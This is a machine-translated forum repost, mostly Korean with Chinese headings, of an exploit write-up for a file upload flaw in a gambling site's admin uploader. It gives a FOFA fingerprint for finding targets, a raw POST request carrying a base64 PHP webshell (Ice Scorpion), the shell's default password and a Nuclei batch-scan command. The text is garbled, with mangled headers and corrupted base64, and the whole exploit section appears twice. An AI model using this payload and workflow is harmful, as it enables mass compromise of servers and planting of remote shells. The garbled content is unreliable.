KoreanHackerTeam
Moderator
0x01 漏洞描述온라인 Dubo는 인터넷 수단 (불법 Dubo 웹 사이트, 시금치 앱, WeChat 그룹 등)을 통해 수행되는 도박 활동을 말합니다. 온라인 Dubo는 불법이며 자금은 법에 의해 보호되지 않기 때문에 많은 "사기 제작"행동이 있습니다. 많은 사람들이 종종 속임수를 낸 후 경찰에 전화하지 않아 가족이 파괴됩니다. 따라서 Dubo를 단속하는 것은 시급합니다. 특정 시금치 시스템에 파일을 업로드하는 데 취약한 것이 있습니다. 공격자는 취약점을 통해 Trojan 파일을 업로드하여 서버가 손실 될 수 있습니다.
0x02 漏洞复现fofa:body='main.e5ee9b2df05fc2d310734b11cc8c911e.css'
1. POC를 실행하고 Ice Scorpion Horse를 업로드하고 업로드 경로로 돌아갑니다.
post //statics/admin/webuploader/0.1.5/server/preview.php http/2host: {{hostname}} user-agent: mozilla/5.0 (Wind Firefox/104.0accept: Text/Html, 응용 프로그램/xhtml+xml, application/xml; q=0.9, image/avif, image/webp,*/*; q=0.8accept-language3360 ZH-CN, ZH; Q=0.8, ZH-TW; Q=0.7, ZH-HK; Q=0.5, en-us; q=0.3, en; q=0.2accept-encoding: GZIP, deflatednt: 1 Upgrade-Insecure-Requests3360 1Sec-fetch-dest3360 Navigatesec-fetch-site: nonesec-fetch-user: 1if-modified-since: mon, 05 9 월 202222202201:19:50 GMTIF-NONE-MATCH: '63154EB6-2733: TRAINGSCONTENT-TYPEPE:0 Application/X-WWW-OrlencodedContent-Length: 746data:image/php; base64, pd9wahakqgvycm9yx3jlcg9ydgluzygwktskc2vzc2lvbl9zdgfydcgpowogicagj gtlet0iztq1ztmyowzlyjvkoti1yiiiiiiiiiiiiiiiiii7iaojjf9trvntsu9owydrj109jgtletskcsrwb3n0pwzpbgvfz2v0x2nvbnrlbnr zkcjwaha6ly9pbnb1dcipowojawyoiwv4dgvuc2lvbl9sb2fkzwqoj29wzw5zc2wnkskkcxskcqkkkkdd0iymfzzty0xyiui mrly29kzsi7cgkjhbvc3q9jhqojhbvc3quiiipowojcqojcwzvcigkat0woyrpphn0cmxlbigkcg9zdck7jgkrkykgewog icagcqkkjicrwb3n0wyrpxsa9icrwb3n0wyrpxv4ka2v5wyrpkzemmtvdoyakicagiakjcx0kcwvsc2ukccxskckkkcg 9zdd1vcgvuc3nsx2rly3j5CHQOJHBVC3QSICJBRVMXMJGILCAKA2V5KTSKCX0KICAGICRHCNI9ZXHWBG9KZSGNFCSJHBV C3QPOWOGICAGJGZ1BMM9JGFYCLSWXTSKICAGICRWYXJHBXM9JGFYCLSXXTSKCWNSYXNZIEN7CHVIBGLJIGZ1BMN0AW9UIF 9faw52b2tlkcrwksb7zxzhbcgkcccc4iiik7fx0kicagiebjywxsx3vzzxjfznvuyyhuzxcgqygplcrwyxjhbxmpowo/pg==s
2. Ice Scorpion이 연결되어 웹 쉘을 얻습니다
얼음 전갈 기본 연결 암호 : Rebeyond
3. Nuclei 배치 검증 스크립트는 지식 행성(存在较多资产)nuclei.exe -t bocaijngj_upload.yaml -l subs.txt -Stats
에 게시되었습니다.
원래 링크에서 재 인쇄 : https://mp.weixin.qq.com/s?__biz=mz...=2EA324E5B3B895BD500A509BD15AE90FCHKSM=C184DF E2F6F356F47A5F80D045FAC890227A50848B23898482CE4F9DAA91FECC54D2F83629SCENE=178CUR_ALBUM_ID=25816779042598912#RD
0x02 漏洞复现fofa:body='main.e5ee9b2df05fc2d310734b11cc8c911e.css'
1. POC를 실행하고 Ice Scorpion Horse를 업로드하고 업로드 경로로 돌아갑니다.
post //statics/admin/webuploader/0.1.5/server/preview.php http/2host: {{hostname}} user-agent: mozilla/5.0 (Wind Firefox/104.0accept: Text/Html, 응용 프로그램/xhtml+xml, application/xml; q=0.9, image/avif, image/webp,*/*; q=0.8accept-language3360 ZH-CN, ZH; Q=0.8, ZH-TW; Q=0.7, ZH-HK; Q=0.5, en-us; q=0.3, en; q=0.2accept-encoding: GZIP, deflatednt: 1 Upgrade-Insecure-Requests3360 1Sec-fetch-dest3360 Navigatesec-fetch-site: nonesec-fetch-user: 1if-modified-since: mon, 05 9 월 202222202201:19:50 GMTIF-NONE-MATCH: '63154EB6-2733: TRAINGSCONTENT-TYPEPE:0 Application/X-WWW-OrlencodedContent-Length: 746data:image/php; base64, pd9wahakqgvycm9yx3jlcg9ydgluzygwktskc2vzc2lvbl9zdgfydcgpowogicagj gtlet0iztq1ztmyowzlyjvkoti1yiiiiiiiiiiiiiiiiii7iaojjf9trvntsu9owydrj109jgtletskcsrwb3n0pwzpbgvfz2v0x2nvbnrlbnr zkcjwaha6ly9pbnb1dcipowojawyoiwv4dgvuc2lvbl9sb2fkzwqoj29wzw5zc2wnkskkcxskcqkkkkdd0iymfzzty0xyiui mrly29kzsi7cgkjhbvc3q9jhqojhbvc3quiiipowojcqojcwzvcigkat0woyrpphn0cmxlbigkcg9zdck7jgkrkykgewog icagcqkkjicrwb3n0wyrpxsa9icrwb3n0wyrpxv4ka2v5wyrpkzemmtvdoyakicagiakjcx0kcwvsc2ukccxskckkkcg 9zdd1vcgvuc3nsx2rly3j5CHQOJHBVC3QSICJBRVMXMJGILCAKA2V5KTSKCX0KICAGICRHCNI9ZXHWBG9KZSGNFCSJHBV C3QPOWOGICAGJGZ1BMM9JGFYCLSWXTSKICAGICRWYXJHBXM9JGFYCLSXXTSKCWNSYXNZIEN7CHVIBGLJIGZ1BMN0AW9UIF 9faw52b2tlkcrwksb7zxzhbcgkcccc4iiik7fx0kicagiebjywxsx3vzzxjfznvuyyhuzxcgqygplcrwyxjhbxmpowo/pg==s
2. Ice Scorpion이 연결되어 웹 쉘을 얻습니다
얼음 전갈 기본 연결 암호 : Rebeyond
3. Nuclei 배치 검증 스크립트는 지식 행성(存在较多资产)nuclei.exe -t bocaijngj_upload.yaml -l subs.txt -Stats
원래 링크에서 재 인쇄 : https://mp.weixin.qq.com/s?__biz=mz...=2EA324E5B3B895BD500A509BD15AE90FCHKSM=C184DF E2F6F356F47A5F80D045FAC890227A50848B23898482CE4F9DAA91FECC54D2F83629SCENE=178CUR_ALBUM_ID=25816779042598912#RD